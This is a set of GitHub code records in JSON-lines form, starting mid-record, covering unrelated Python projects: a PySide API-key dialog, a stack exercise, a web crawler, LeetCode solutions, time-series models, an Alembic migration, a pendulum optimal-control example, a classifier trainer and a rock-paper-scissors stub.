__init__(self, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself.setWindowTitle(\"Your OpenAI API Key\")\n\n\t\tself.api_key_label = QLabel(\"API Key:\")\n\t\tself.api_key_edit = QLineEdit()\n\t\tself.api_key_edit.setEchoMode(QLineEdit.Password)\n\t\tself.button_box = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n\t\tself.save_checkbox = QCheckBox(\"Save API Key\")\n\t\tself.button_box.accepted.connect(self.accept)\n\t\tself.button_box.rejected.connect(self.reject)\n\n\t\tmain_layout = QVBoxLayout()\n\t\tmain_layout.addWidget(self.api_key_label)\n\t\tmain_layout.addWidget(self.api_key_edit)\n\t\tmain_layout.addWidget(self.save_checkbox)\n\t\tmain_layout.addWidget(self.button_box)\n\n\t\tself.setLayout(main_layout)\n\n\tdef api_key(self) -> str:\n\t\treturn self.api_key_edit.text()\n\n\tdef save_api_key(self) -> bool:\n\t\treturn self.save_checkbox.isChecked()\n","repo_name":"aldorvv/openai-pyside-client","sub_path":"ui/api_key_dialog.py","file_name":"api_key_dialog.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14361508482","text":"class Pilha():\n    def __init__(self):\n        self.data = [] # creates the stack\n\n    def append(self,valor):\n        self.data.append(valor) # adds to the top of the stack\n\n    def pop(self):\n        return self.data.pop() # removes and returns the top of the stack\n\n    def isEmpty(self):\n        return len(self.data) == 0\n\ndef validar(expressao):\n    p = Pilha() \n    for i in expressao:\n        if i == '(':\n            p.append(i)\n        elif i == ')':\n            if p.isEmpty():\n                return False\n            p.pop()\n    return p.isEmpty()\n\np = Pilha()\npalavra = \"uepb\"\np_invertido = '' # empty string variable\nfor i in palavra: #i=u, i=e, i=p, i=b\n    p.append(i) # push each element onto the stack\nfor i in range(len(palavra)):\n    p_invertido = p_invertido + p.pop() # pop returns the last element of the stack\nprint(p_invertido)\n    \n\n#exp = '()()'\n#print(validar(exp))","repo_name":"Gabrielgln/CodigosFaculdade","sub_path":"Python_2022.1/Unidade1/EstruturaDeDados-Pilha.py","file_name":"EstruturaDeDados-Pilha.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26174724313","text":"#!/usr/bin/env python3\n\nimport datetime\nimport random\nimport re\nimport ssl\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.parse import urlparse\nfrom urllib.request import urlopen\n\npages = set()\ncontext = ssl._create_unverified_context()\nrandom.seed(datetime.datetime.now())\n\n# Retrieves a list of all internal links found on a page\ndef get_internal_links(bs_obj, include_url):\n    include_url = (urlparse(include_url).scheme +\n                   '://' +\n                   urlparse(include_url).netloc)\n    internal_links = []\n\n    # Find all links beginning with '/'\n    for link in bs_obj.findAll(\n            'a', href = re.compile('^(/|.*' + include_url + ')')):\n        if link.attrs['href'] is not None:\n            if link.attrs['href'] not in internal_links:\n                if link.attrs['href'].startswith('/'):\n                    internal_links.append(include_url + link.attrs['href'])\n                else:\n                    internal_links.append(link.attrs['href'])\n\n    return internal_links\n\n# Retrieve a list of external links found on page\ndef get_external_links(bs_obj, exclude_url):\n    external_links = []\n\n    # Finds links starting with 'http' not containing the current url\n    for link in bs_obj.findAll(\n            'a', href = re.compile('^(http|www)((?!'
+ exclude_url + ').)*$')):\n\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in external_links:\n external_links.append(link.attrs['href'])\n\n return external_links\n\ndef get_random_external_link(starting_page):\n html = urlopen(starting_page, context = context)\n bs_obj = bs(html, 'html.parser')\n external_links = get_external_links(bs_obj, urlparse(starting_page).netloc)\n\n if len(external_links) == 0:\n print('No external links, looking in the site for one...')\n domain = (urlparse(starting_page).scheme +\n '://' +\n urlparse(starting_page).netloc)\n internal_links = get_internal_links(bs_obj, domain)\n\n return get_random_external_link(\n internal_links[random.randint(0, len(internal_links) - 1)])\n else:\n return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n external_link = get_random_external_link(starting_site)\n print('Following random external link:' + external_link)\n\n follow_external_only(external_link)\n\nfollow_external_only('http://oreilly.com')\n\n \n \n","repo_name":"damiansp/webscraping","sub_path":"net_crawl.py","file_name":"net_crawl.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"532116331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 23 12:09:08 2019\n\nmain file\n\n@author: tadahaya\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--lower\", default=False)\nargs = parser.parse_args()\n\ndef main():\n hello = \"Hello World!\"\n if args.lower:\n hello = hello.lower()\n print(hello)\n\ndef main2():\n goodbye = \"Goodbye World!\"\n if args.lower:\n goodbye = goodbye.lower()\n print(goodbye)\n\n# not necessary when entry_points are used\nif __name__ == \"__main__\":\n main()","repo_name":"mizuno-group/cli_package","sub_path":"mymodule/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38765156329","text":"\"\"\"\nGiven a non-empty integer array, find the minimum number of moves required to make all array elements equal, where a move is incrementing a selected element by 1 or decrementing a selected element by 1.\n\nYou may assume the array's length is at most 10,000.\n\nExample:\n\nInput:\n[1,2,3]\n\nOutput:\n2\n\nExplanation:\nOnly two moves are needed (remember each move increments or decrements one element):\n\n[1,2,3] => [2,2,3] => [2,2,2]\n\"\"\"\n\n\n# find median point, statistics in python 3.4 \nfrom statistics import median\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n m = median(nums)\n result = 0\n for x in nums:\n result += abs(x-m)\n return result\n \n\n# similar to \"meeting point\" problem\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort() # O(n*logn)\n i,j = 0,len(nums)-1\n count = 0\n while i < j: # O(n)\n count += nums[j] - nums[i]\n i += 1\n j -= 1\n return count \n\n\n# quick select, find median\n# https://en.wikipedia.org/wiki/Quickselect\n# when nums is a long list, RecursionError: maximum recursion depth exceeded in comparison\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n\n def select_kth(k, nums, start, end):\n # pivot is the kth smallest element \n pivot = nums[end] # start with 
random pivot; this partition scheme requires the pivot to be nums[end] \n            left, right = start, end\n            while True:\n                while (left < right) and (nums[left] < pivot):\n                    left += 1\n                while (left < right) and (nums[right] >= pivot):\n                    right -= 1\n                if left == right:\n                    break\n                nums[left], nums[right] = nums[right], nums[left] # swap \n            nums[left], nums[end] = nums[end], nums[left] # swap \n            if k == left+1:\n                return pivot\n            elif k < left+1:\n                return select_kth(k, nums, start, left-1)\n            else: # k > left\n                return select_kth(k, nums, left+1, end)\n        \n        \n        def find_median(nums):\n            return select_kth(len(nums)//2+1, nums, 0, len(nums)-1)\n        \n        \"\"\"\n        def find_median(nums):\n            if len(nums)%2: # odd length \n                return select_kth(len(nums)//2, nums, 0, len(nums)-1)\n            else: # even length\n                left = select_kth((len(nums)-1)//2, nums, 0, len(nums)-1)\n                right = select_kth((len(nums)+1)//2, nums)\n                return (left+right)/2\n        \"\"\"\n        \n        result = 0\n        median = find_median(nums)\n        for x in nums:\n            result += abs(median-x)\n        return result\n        \n        \n\n# pythonic \n\nclass Solution(object):\n    def minMoves2(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        median = sorted(nums)[len(nums)//2]\n        return sum([abs(n-median) for n in nums])\n\n\n\nclass Solution(object):\n    def minMoves2(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        nums.sort()\n        return sum([nums[~i]-nums[i] for i in range(len(nums)//2)])\n\n# ~ operator: \n# operator.inv(obj)\n# operator.invert(obj)\n# operator.__inv__(obj)\n# operator.__invert__(obj)\n# Return the ```bitwise inverse of the number obj```. This is equivalent to ~obj.\n# 0, 1, 2, ... get turned into -1, -2, -3, ...\n# nums[~i] - nums[i] if i = 0\n# nums[-1] - nums[0]\n    \n    \ns = Solution()\nnum = [1,2,4]\nc = s.minMoves2(num)\nprint(c)\n","repo_name":"rarezhang/leetcode","sub_path":"math/462.MinimumMovestoEqualArrayElementsII.py","file_name":"462.MinimumMovestoEqualArrayElementsII.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38857980034","text":"import pandas as pd \nimport numpy as np\nfrom sklearn import preprocessing\nimport src.time_series_functions as tsf\n\n\ndef fit_sklearn_model(ts, model, test_size, val_size):\n    \"\"\"\n    Parameters: \n        ts (pandas.DataFrame): time series values created by \n                            src.time_series_functions.create_windowing\n        model (Sklearn Model): base model to predict ts\n        test_size (int): size of test set\n        val_size (int): size of validation set (if you do not use validation set, \n                        val_size can be set as 0)\n\n    Returns: \n        Sklearn Model: trained model\n    \"\"\"\n\n    train_size = len(ts) - test_size - val_size\n    y_train = ts['actual'][0:train_size]\n    x_train = ts.drop(columns=['actual'], axis=1)[0:train_size]\n\n    return model.fit(x_train, y_train)\n\n\ndef predict_sklearn_model(ts, model):\n    \"\"\"\n    Parameters: \n        ts (pandas.DataFrame): time series values created by \n                            src.time_series_functions.create_windowing\n        model (Sklearn Model): base model to predict ts\n        \n    Returns: \n        numpy array: predicted values\n    \"\"\"\n\n    x = ts.drop(columns=['actual'], axis=1)\n    return model.predict(x)\n\ndef additive_hybrid_model(predicted, real, time_window, base_model,\n                          test_size, val_size):\n    \"\"\"\n    Parameters: \n        real (numpy array): real values of time series \n        predicted (numpy array): linear prediction of the time series\n        time_window (int): time window of error prediction model\n        base_model (Sklearn model): base model to predict the error\n        test_size (int): size of test
set\n        val_size (int): size of validation set (if you do not use validation set, \n                        val_size can be set as 0)\n\n    Returns: \n        dict: following the src.time_series_functions.make_metrics_avaliation format\n    \"\"\"\n\n    train_size = len(predicted) - test_size\n\n    errors = np.subtract(real, predicted)\n\n    min_max_scaler = preprocessing.MinMaxScaler()\n    min_max_scaler.fit(errors[0:train_size].reshape(-1, 1))\n    normalized_error = min_max_scaler.transform(errors.reshape(-1, 1))\n\n    # fit_predict\n\n    error_values = pd.DataFrame({'actual': normalized_error.flatten()})\n\n    error_windowed = tsf.create_windowing( df=error_values, lag_size=time_window)\n\n    pi = fit_sklearn_model(ts=error_windowed, model=base_model,\n                           test_size=test_size, val_size=val_size)\n\n    pi_pred = predict_sklearn_model(ts=error_windowed, model=pi)\n    # _____________________________\n\n    pi_pred = min_max_scaler.inverse_transform(pi_pred.reshape(-1, 1)).flatten()\n\n    prevs = predicted[time_window:] + pi_pred\n\n    ts_actual = real[time_window:]\n\n    return tsf.make_metrics_avaliation(ts_actual, prevs, test_size,\n                                       val_size, base_model.get_params(deep=True))\n\ndef format_nolic_input(real, nonlinear_forecast, linear_forecast, test_size, time_window):\n    \"\"\"\n    Parameters: \n        real (numpy array): real values of time series \n        linear_forecast (numpy array): linear prediction of the time series\n        nonlinear_forecast (numpy array): additive hybrid system prediction\n        time_window (int): time window of error prediction model\n        test_size (int): size of test set\n\n    Returns: \n        pandas DataFrame: format of input x output\n        sklearn preprocessing: data normalization model\n    \"\"\"\n    train_size_represents = len(real) - test_size\n    \n    error_values = nonlinear_forecast - linear_forecast\n\n    min_max_scaler = preprocessing.MinMaxScaler()\n    min_max_scaler.fit(real[0:train_size_represents].reshape(-1, 1))\n\n    min_max_scaler_linear = preprocessing.MinMaxScaler()\n    min_max_scaler_linear.fit(linear_forecast[0:train_size_represents].reshape(-1, 1))\n\n    min_max_scaler_error = preprocessing.MinMaxScaler()\n    min_max_scaler_error.fit(error_values[0:train_size_represents].reshape(-1, 1))\n\n    real_normalized = min_max_scaler.transform(real.reshape(-1, 1)).flatten()\n    linear_normalized = min_max_scaler_linear.transform(linear_forecast.reshape(-1, 1)).flatten()\n    error_normalized = min_max_scaler_error.transform(error_values.reshape(-1, 1)).flatten()\n    \n    tsf_part = tsf.create_windowing(lag_size=(time_window - 1),\n                                    df=pd.DataFrame({'actual': linear_normalized}))\n\n    ef_part = tsf.create_windowing(lag_size=(time_window - 1),\n                                   df=pd.DataFrame({'actual': error_normalized}))\n\n    real_part = tsf.create_windowing(lag_size=(time_window - 1),\n                                     df=pd.DataFrame({'actual': real_normalized}))\n\n    tsf_part.columns = ['ts_prev' + str(i) for i in reversed(range(0, time_window))]\n    ef_part.columns = ['error_prev' + str(i) for i in reversed(range(0, time_window))]\n\n    ts_formated = pd.concat([ef_part, tsf_part,\n                             real_part['actual']], axis=1)\n    return ts_formated, min_max_scaler\n\ndef nolic_model(linear_forecast, real, nonlinear_forecast,time_window, \n                base_model, test_size,val_size):\n\n    \"\"\"\n    Parameters: \n        real (numpy array): real values of time series \n        linear_forecast (numpy array): linear prediction of the time series\n        nonlinear_forecast (numpy array): additive hybrid system prediction\n        time_window (int): time window of error prediction model\n        base_model (Sklearn model): base model to combine the linear and nonlinear prediction\n        test_size (int): size of test set\n       
val_size (int): size of validation set (if you do not use validation set, \n val_size can be set as 0)\n\n Returns: \n dict: following the src.time_series_functions.make_metrics_avaliation format\n \"\"\"\n\n ts_formated, min_max_scaler= format_nolic_input(real, nonlinear_forecast, linear_forecast, test_size, time_window)\n\n p = fit_sklearn_model(ts=ts_formated, model=base_model,\n test_size=test_size, val_size=val_size)\n\n pred = predict_sklearn_model(ts=ts_formated,\n model=p)\n\n pred = min_max_scaler.inverse_transform(pred.reshape(-1, 1)).flatten()\n\n real_actual = real[(time_window - 1):]\n \n result_metrics = tsf.make_metrics_avaliation(real_actual, pred, test_size,\n val_size, base_model.get_params(deep=True))\n return result_metrics\n","repo_name":"domingos108/time_series_functions","sub_path":"src/hybrid_systems.py","file_name":"hybrid_systems.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"32412086424","text":"from csv import DictReader, reader\n\nwith open(\"fighters.csv\", \"r\") as file:\n csv_reader = reader(file, delimiter=\",\") # gives an iterator\n next(csv_reader)\n for fighter in csv_reader:\n print(f\"{fighter[0]} is from {fighter[1]}\")\n\n\nwith open(\"fighters.csv\", \"r\") as file:\n csv_reader = reader(file, delimiter=\",\")\n data = list(csv_reader)\n for fighter in data:\n print(f\"{fighter[0]} is from {fighter[1]}\")\n\n\nwith open(\"fighters.csv\") as file:\n csv_reader = DictReader(file)\n\n for fighter in csv_reader:\n print(fighter[\"Name\"])\n","repo_name":"JamesMcGahn/Projects","sub_path":"Learning & Demos/Python/Simple/Basics/FileIO/reading_csv.py","file_name":"reading_csv.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10055302753","text":"\"\"\"empty message\n\nRevision ID: 6aaae13c483c\nRevises: aa3499b09be2\nCreate Date: 2016-09-23 15:26:13.039992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6aaae13c483c'\ndown_revision = 'aa3499b09be2'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('work_day',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
+{"seq_id":"17780393572","text":"import os\nimport h5py\nimport imageio\nfrom pybdv.metadata import get_data_path\n\n\ndef parse_coordinate(coord):\n    coord = coord.rstrip('\\n')\n    pos_start = coord.find('(') + 1\n    pos_stop = coord.find(')')\n    coord = coord[pos_start:pos_stop]\n    coord = coord.split(',')\n    coord = [float(co) for co in coord]\n    assert len(coord) == 3, \"Coordinate conversion failed\"\n    return coord\n\n\ndef get_res_level(level=None):\n    res0 = [.01, .01, .025]\n    res1 = [.02, .02, .025]\n    resolutions = [res0] + [[re * 2 ** i for re in res1] for i in range(8)]\n    if level is None:\n        return resolutions\n    else:\n        assert level <= 6,\\\n            \"Scale level %i is not supported, only supporting up to level 8\" % level\n        return resolutions[level]\n\n\n# TODO figure out compression in imageio\ndef save_tif_stack(raw, save_file):\n    try:\n        imageio.volwrite(save_file, raw)\n        return True\n    except RuntimeError:\n        print(\"Could not save tif stack, saving slices to folder %s instead\"\n              % save_file)\n        save_tif_slices(raw, save_file)\n\n\ndef save_tif_slices(raw, save_file):\n    save_folder = os.path.splitext(save_file)[0]\n    os.makedirs(save_folder, exist_ok=True)\n    for z in range(raw.shape[0]):\n        out_file = os.path.join(save_folder, \"z%05i.tif\" % z)\n        imageio.imwrite(out_file, raw[z])\n\n\ndef save_tif(raw, save_file):\n    if imageio is None:\n        save_tif_slices(raw, save_file)\n    else:\n        if not save_tif_stack(raw, save_file):\n            save_tif_slices(raw, save_file)\n\n\ndef name_to_path(name):\n    name_dict = {'raw': 'images/sbem-6dpf-1-whole-raw.xml',\n                 'cells': 'segmentations/sbem-6dpf-1-whole-segmented-cells-labels.xml',\n                 'nuclei': 'segmentations/sbem-6dpf-1-whole-segmented-nuclei-labels.xml',\n                 'cilia': 'segmentations/sbem-6dpf-1-whole-segmented-cilia-labels.xml',\n                 'chromatin': 'segmentations/sbem-6dpf-1-whole-segmented-chromatin-labels.xml'}\n    assert name in name_dict, \"Name must be one of %s, not %s\" % (str(name_dict.keys()),\n                                                                  name)\n    return name_dict[name]\n\n\ndef name_to_base_scale(name):\n    scale_dict = {'raw': 0,\n                  'cells': 1,\n                  'nuclei': 3,\n                  'cilia': 0,\n                  'chromatin': 1}\n    return scale_dict[name]\n\n\ndef cutout_data(tag, name, scale, bb_start, bb_stop):\n    assert all(sta < sto for sta, sto in zip(bb_start, bb_stop))\n\n    path = os.path.join('data', tag, name_to_path(name))\n    path = get_data_path(path, return_absolute_path=True)\n    resolution = get_res_level(scale)\n\n    base_scale = name_to_base_scale(name)\n    assert base_scale <= scale, \"%s does not support scale %i; minimum is %i\" % (name, scale, base_scale)\n    data_scale = scale - base_scale\n\n    bb_start_ = [int(sta / re) for sta, re in zip(bb_start, resolution)][::-1]\n    bb_stop_ = [int(sto / re) for sto, re in zip(bb_stop, resolution)][::-1]\n    bb = tuple(slice(sta, sto) for sta, sto in zip(bb_start_, bb_stop_))\n\n    key = 't00000/s00/%i/cells' % data_scale\n    with h5py.File(path, 'r') as f:\n        ds = f[key]\n        data = ds[bb]\n    return data\n\n\n# TODO support bdv-hdf5 as additional format\ndef to_format(path):\n    ext = os.path.splitext(path)[1]\n    if ext.lower() in ('.hdf', '.hdf5', '.h5'):\n        return 'hdf5'\n    elif ext.lower() in ('.n5',):\n        return 'n5'\n    elif ext.lower() in ('.tif', '.tiff'):\n        return 'tif-stack'\n    elif ext.lower() in ('.zr', '.zarr'):\n        return 'zarr'\n    else:\n        print('Could not match', ext, 'to data format. Displaying the data instead')\n        return 'view'\n\n\ndef save_data(data, path, save_format, name):\n    if save_format == 'hdf5':\n        with h5py.File(path) as f:\n            f.create_dataset(name, data=data, compression='gzip')\n    elif save_format in ('n5', 'zarr'):\n        import z5py  # import here, because we don't want to make z5py mandatory dependency\n        with z5py.File(path, use_zarr_format=save_format == 'zarr') as f:\n            f.create_dataset(name, data=data, compression='gzip',\n                             chunks=(64, 64, 64))\n    elif save_format == 'tif-stack':\n        save_tif_stack(data, path)\n    elif save_format == 'tif-slices':\n        save_tif_slices(data, path)\n    elif save_format == 'view':\n        from cremi_tools.viewer.volumina import view\n        view([data])\n    else:\n        raise RuntimeError(\"Unsupported format %s\" % save_format)\n\n\ndef make_cutout(tag, name, scale, bb_start, bb_stop, out_path, out_format=None):\n    data = cutout_data(tag, name, scale, bb_start, bb_stop)\n    out_format = to_format(out_path) if out_format is None else out_format\n    assert out_format in ('hdf5', 'n5', 'tif-stack', 'tif-slices', 'zarr', 'view'), \"Invalid format:\" % out_format\n    data = cutout_data(tag, name, scale, bb_start, bb_stop)\n    save_data(data, out_path, out_format, name)\n","repo_name":"mobie/platybrowser-project","sub_path":"mmpb/export/extract_subvolume.py","file_name":"extract_subvolume.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"}
+{"seq_id":"24822757214","text":"\"\"\"\nA optimal control program consisting in a triple pendulum starting downward and ending upward\nwhile requiring the minimum of generalized forces. The solver is only allowed to move the pendulum sideways.\n\"\"\"\n\n\nimport biorbd_casadi as biorbd\nfrom bioptim import (\n    OptimalControlProgram,\n    DynamicsFcn,\n    Dynamics,\n    Bounds,\n    QAndQDotBounds,\n    InitialGuess,\n    ObjectiveFcn,\n    Objective,\n)\n\nbiorbd_model = biorbd.Model(\"Triple_Pendulum.bioMod\")\n#biorbd_model = biorbd.Model(\"pendulum.bioMod\")\n#bioviz.Viz(\"Triple_Pendulum.bioMod\").exec()\n\n# Dynamics definition\ndynamics = Dynamics(DynamicsFcn.TORQUE_DRIVEN)\n# State Boundaries conditions\nx_bounds = QAndQDotBounds(biorbd_model)\n#minimal and maximal bounds\n# for all the degrees of freedom and velocities on three columns corresponding\n# to the starting node, the intermediate nodes and the final node\nx_bounds[:,[0,-1]]=0\nx_bounds[0,-1]=3.14\n\n# Control Boundary conditions\nu_bounds = Bounds([-100, -50, -10], [100, 50, 10])\n\n# Objectif controls\nobjective_functions = Objective(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key=\"tau\")\n\n#Initial Guess\nx_init = InitialGuess([0, 0, 0, 0, 0, 0])\nu_init = InitialGuess([0, 0, 0])\n\n# Optimal Control Problem\nocp = OptimalControlProgram(\n    biorbd_model,\n    dynamics,\n    n_shooting=20,\n    phase_time=4,\n    x_init=x_init,\n    u_init=u_init,\n    x_bounds=x_bounds,\n    u_bounds=u_bounds,\n    objective_functions=objective_functions,\n    n_threads=8\n    )\n\nsol = ocp.solve(show_online_optim=False)\n\n# sol.graphs()\n\nimport bioviz\nsol.animate()","repo_name":"Ipuch/My_bioptim_examples","sub_path":"Triple_Pendulum/torque_driven_triple_pendulum.py","file_name":"torque_driven_triple_pendulum.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"}
+{"seq_id":"30643069798","text":"import time\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom itertools import count\n\nfrom utilities.utils import *\n\n\nresult_log = \"Top_{}: precision: {:.4f}, recall: {:.4f}, F1: {:.4f}, \" + \\\n             \"hits_score: {:.4f}, hits@3 score: {:.4f}, hits@5 score: {:.4f}\"\n\n\ndef train_classifier(classifier, author_agent, ment_agent, embeddings,\n                     train_data, valid_data, l2, device, max_epoch, best_f1=0):\n    print(f\"Training classifier, now is {time.ctime(time.time())}\")\n    optimizer = optim.Adam([{\"params\": classifier.parameters()},\n                            {\"params\": embeddings.parameters()}],\n                           weight_decay=l2)\n    scheduler = optim.lr_scheduler.ReduceLROnPlateau(\n        optimizer, 'max', factor=0.1, patience=2, threshold_mode='abs')\n    for epoch in count(1):\n        current_lr = optimizer.state_dict()[\"param_groups\"][0][\"lr\"]\n        print(\"Epoch: \", epoch, \" lr: \", current_lr)\n        train_epoch(\n            classifier, author_agent, ment_agent, embeddings,\n            train_data, optimizer, device)\n        if epoch % 1 == 0:\n            f1 = valid_epoch(\n                classifier, author_agent, ment_agent, embeddings,\n                valid_data, device)\n            if f1 > best_f1:\n                best_f1 = f1\n                torch.save(\n                    classifier.state_dict(), \"parameter/classifier\")\n                torch.save(\n                    embeddings.state_dict(), \"parameter/embeddings\")\n                print(\"Weights saved @ f1 = {:.3f}\".format(best_f1))\n            scheduler.step(f1)\n\n        if current_lr < 1e-6 or epoch >= max_epoch:\n            print(f\"Classifier traning is stopped, lr is {current_lr}\")\n            classifier.load_state_dict(\n                torch.load(\"parameter/classifier\"))\n            embeddings.load_state_dict(\n                torch.load(\"parameter/embeddings\"))\n            embeddings.to(device), classifier.to(device)\n            print(\n                \"Load best model in this training episode, f1: {:.3f}\"\n                .format(best_f1))\n            print(f\"Classifier training stop at {time.ctime(time.time())}\")\n            break\n\n    return best_f1\n\n\ndef train_epoch(classifier, author_agent, ment_agent, embeddings,\n                data_loader, optimizer, device, verbose=1):\n    classifier.train(), embeddings.train()\n    author_agent.eval(), ment_agent.eval()\n    loss_total, acc_num, total_num = [], [], []\n    total_num = 0\n\n    for batch_idx, data in enumerate(data_loader):\n        tweet, user_h, ment_h, target = [item.to(device) for item in data]\n        # user_h: (batch, 33*200)\n\n        optimizer.zero_grad()\n        tweet, user_h, ment_h = map(embeddings, [tweet, user_h, ment_h])\n        # user_h: (batch, 33*200, 300)\n\n        user_h = user_h.view(-1, 200, 33, 300)\n        ment_h = ment_h.view(-1, 200, 33, 300)\n\n        author_agent.reset_buffer()\n        ment_agent.reset_buffer()\n\n        output = classifier(tweet, user_h, ment_h, author_agent, ment_agent)\n        output = output.squeeze(dim=-1)\n        batch_acc = output.ge(0).float() == target\n        acc_num.append(\n            torch.sum(batch_acc.long()).item())\n        total_num += len(target)\n\n        loss = F.binary_cross_entropy_with_logits(output, target)\n        loss.backward()\n        optimizer.step()\n        loss_total.append(loss.item())\n\n        if verbose > 0:\n            print(\"Train: [{}/{}, {:.2f}%], loss: {:.4f}, acc: {:.4f}\".format(\n                batch_idx+1, len(data_loader),\n                100 * (batch_idx+1) / len(data_loader),\n                sum(loss_total)/(batch_idx+1), sum(acc_num)/total_num),\n                end='\\r')\n    if verbose > 0:\n        print()\n\n\ndef valid_epoch(classifier, author_agent, ment_agent,\n                embeddings, data_loader, device):\n    classifier.eval(), embeddings.eval()\n    author_agent.eval(), embeddings.eval()\n    y_pred, y_test, acc_num = [], [], []\n    total_num = 0\n\n    for batch_idx, data in enumerate(data_loader):\n        tweet, user_h, ment_h, target = [item.to(device) for item in data]\n        tweet, user_h, ment_h = map(embeddings, [tweet, user_h, ment_h])\n\n        user_h = user_h.view(-1, 200, 33, 300)\n        ment_h = ment_h.view(-1, 200, 33, 300)\n\n        author_agent.reset_buffer()\n        ment_agent.reset_buffer()\n\n        output = classifier(tweet, user_h, ment_h, author_agent, ment_agent)\n        output = output.squeeze(dim=-1)\n        batch_acc = output.ge(0).float() == target\n        acc_num.append(\n            torch.sum(batch_acc.long()).item())\n        total_num += len(target)\n\n        py = output.data\n        y_pred.append(py)\n        y_test.append(target)\n\n        print(\"Test: [{}/{}, {:.2f}%], acc: {:.4f}\".format(\n            batch_idx+1, len(data_loader),\n            100 * (batch_idx+1) / len(data_loader), sum(acc_num)/total_num),\n            end='\\r')\n    print()\n    mrr = mrr_score(y_test, y_pred)\n    bp = bpref(y_test, y_pred)\n    print(\"MRR: {}, Bpref: {}\".format(mrr, bp))\n\n    precision = precision_score(y_test, y_pred, k=1)\n    recall = recall_score(y_test, y_pred, k=1)\n    hscore = hits_score(y_test, y_pred, k=1)\n    hits3 = hits_score(y_test, y_pred, k=3)\n    hits5 = hits_score(y_test, y_pred, k=5)\n    F1 = 2 * (precision * recall) / (precision + recall)\n    print(result_log.format(1, precision, recall, F1, hscore, hits3, hits5))\n\n    return F1\n","repo_name":"mritma/CROMA","sub_path":"trainers/classifier_trainer.py","file_name":"classifier_trainer.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"}
+{"seq_id":"4191081296","text":"\"\"\"import random\r\n\r\nfor i in range(1) :\r\nnum=int(input(“가위= 0 바위= 1 보= 2\\n\\n중하나를결정하시오”))\r\ncom=random.randrange(0,3,1)\r\nprint(“컴퓨터의가위바위보숫자:”,com)\r\n\r\nif num>2 or num<0:\r\nprint(“잘못입력”)\r\nbreak\r\nelif num==com:\r\nprint(“비겼습니다\\n”)\r\nelif (num==0 and com ==1) or (num==1 and com==2) or (num==2 and com==0):\r\nprint(“졌습니다\\n”)\r\nelse:\r\nprint(“이겼습니다”)\"\"\"\r\n\r\na = input()\r\nb = input()\r\nlst = [\"가위\", \"바위\", \"보\"]\r\nresult = \"잘못된 입력입니다.\"\r\n\r\n#a가 가위인 경우\r\nif a == lst[0]:\r\n    #b가 낸 것에 따라 결과 설정\r\n    if b ==lst[0]:\r\n        result = \"Result : Draw\"\r\n    elif b == lst[1]:\r\n        result = \"Result : Man2 Win!\"\r\n    elif b == lst[2]:\r\n        result = \"Result : Man1 Win!\"\r\n","repo_name":"jellymj/TIL","sub_path":"16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
